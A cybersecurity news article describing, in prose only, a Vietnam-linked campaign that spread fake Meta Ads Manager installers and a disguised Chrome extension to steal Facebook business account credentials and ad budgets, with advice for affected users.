Currently, the campaign has affected approximately 800 individuals and businesses globally, including 310 in the United States, with an ad budget compromise of $180,000.
Facebook serves as a thriving platform for optimizing ad campaigns, making it a crucial tool for businesses worldwide to boost their revenues. However, it is not without its downsides, as the platform has been exploited by cybercriminals to spread malware and, even worse, ransomware.
A recent warning issued by Malwarebytes’ senior threat researcher, Jérôme Segura, highlights the need for businesses to be vigilant. He cautions against falling victim to malicious Meta ad manager downloaders and Chrome extensions, particularly when faced with offers that seem too good to be true and involve clicking on suspicious URLs. The primary targets of these attacks are often business account users who are willing to invest their ad dollars in Meta platforms.
Vietnamese Hackers Targeting Businesses’ Advertising Accounts
According to Malwarebyte’s latest blog post, a newly identified cybercrime gang originating from Vietnam has been engaging in targeted attacks on Facebook business users, with the aim of stealing advertising accounts. What makes this situation even more alarming is that victims are not limited to a specific geographic region; the attacks have been reported worldwide.
Jérôme Segura, in his analysis, reported a noticeable surge in sponsored posts and accounts that are attempting to impersonate Meta/Facebook Ad Manager in recent weeks. Delving deeper into the matter, investigators uncovered that the cybercriminals are distributing counterfeit software, falsely promoting it as a more effective tool for optimizing ads on Facebook. Businesses and advertisers need to be aware of this emerging threat to safeguard their accounts and assets.
The cybercrime gang employs malware-infected Chrome extensions as their method of choice to steal Facebook business account credentials. What is particularly intriguing is that Jérôme Segura was able to detect their campaign thanks to a mistake made by the threat actors themselves.
Apparently, the attackers accidentally placed one of the malware files in the wrong location, which ultimately led to the inadvertent exposure of stolen data. This fortunate error provided valuable insights to the researchers at Malwarebytes, aiding them in their investigation and analysis of the cybercrime operation.
What Happens When Meta Business Accounts Get Infected with Malware?
Once the malicious extension is downloaded, the attackers gain control over the business’s ad budget, allowing them to exploit it according to their own agenda. The campaign came to light in early June when the threat actors enticed businesses with deceptive Facebook Ads Manager program installers, distributed through URLs, promising to enhance ad revenues.
To make their scheme more convincing, the attackers utilized fraudulent accounts with thousands of followers. Consequently, the posts made through these accounts quickly went viral, further deceiving unsuspecting victims and expanding the impact of the attack.
The victims are redirected to phishing pages that imitate the appearance of Meta’s official logo and branding. Upon downloading the program file, several components of an MSI installer package are installed in the directory: C:\Program Files (x86)\Ads Manager\Ads Manager. Subsequently, a batch script is initiated, opening a new browser window displaying a custom extension.
In this window, the unsuspecting victim is prompted to enter their Facebook credentials on a deceptive login page. It is through this fraudulent login page that the cybercriminals aim to harvest the victims’ login credentials, granting them unauthorized access to the victims’ Facebook business accounts.
The custom extension cleverly masquerades as an unpacked Google Translate extension, making it appear innocuous and legitimate. However, upon reverse engineering, it becomes evident that the extension’s code is entirely unrelated to its purported function. Instead, the sole purpose of this deceptive extension is to illicitly gather Facebook login credentials and cookies from unsuspecting users.
To exfiltrate the stolen data, the cybercriminals employ a cunning technique of bypassing Content Security Policy (CSP) restrictions by leveraging Google Analytics. This allows them to transmit the stolen information undetected and without triggering any alarms. In effect, the attackers exploit the widely-used Google Analytics service as a conduit to sneak the stolen data out of the victim’s system and into their own malicious infrastructure.
This sophisticated method allows the cybercrime gang to continue their illicit activities discreetly, evading detection while compromising the security and privacy of Facebook business account users.
Just for your information, Facebook Ad Manager is a tool that enables users to run online ads on various social media platforms owned by Meta, including Instagram. Recently, cybersecurity researchers detected approximately 20 malicious ad manager archives, which were used to distribute Chrome extensions with the intention of hijacking Facebook business accounts.
During their investigation, researchers stumbled upon a newly discovered phishing site and found an unexpected mistake made by the cybercriminals. The attackers had failed to include the payload but inadvertently leaked the stolen data.
Recognizing their error, the criminals promptly removed the file from their Google Drive account and then updated the download link on the phishing site with a new file hosted on MediaFire. This move was likely an attempt to cover their tracks and maintain their malicious activities undetected.
Upon further analysis, researchers identified column titles in the Vietnamese language within the stolen data, which were directly related to ad budgets and currencies. This points to the origin of the cybercrime gang or indicates that they might be targeting victims from Vietnamese-speaking regions.
As of now, the campaign has victimized around 800 individuals and businesses, highlighting the severity of the threat and the importance of staying vigilant against such phishing attacks and malware distribution schemes. What’s worse, the threat actors managed to compromise over $180,000 in ad budget including from 300 victims within the United States.
In previous research, Meta disclosed that threat actors like DuckTail, among others, have been targeting Facebook advertising accounts over an extended period. While Jérôme Segura acknowledges the uncertainty regarding the direct attribution of this threat actor to DuckTail, he highlights the undeniable similarities in motives and a shared preference for hacking Facebook business accounts, which raises the possibility of a connection.
In response to the campaign’s discovery, Facebook has been duly notified, and the company has taken prompt action. To protect themselves, users of Facebook business manager accounts are advised to immediately revoke access for any unidentified users and conduct a thorough scan of their computers to identify and remove any potential malware that might have been installed. Taking these precautionary measures will help safeguard their accounts and data from falling victim to these malicious attacks.
- Mandrake Android malware stealing Facebook data since 2016
- Facebook ads dropped malware posing as a Clubhouse PC app
- CopperStealer malware steals Facebook and Google passwords
- Facebook removes 100s of accounts for iOS and Android malware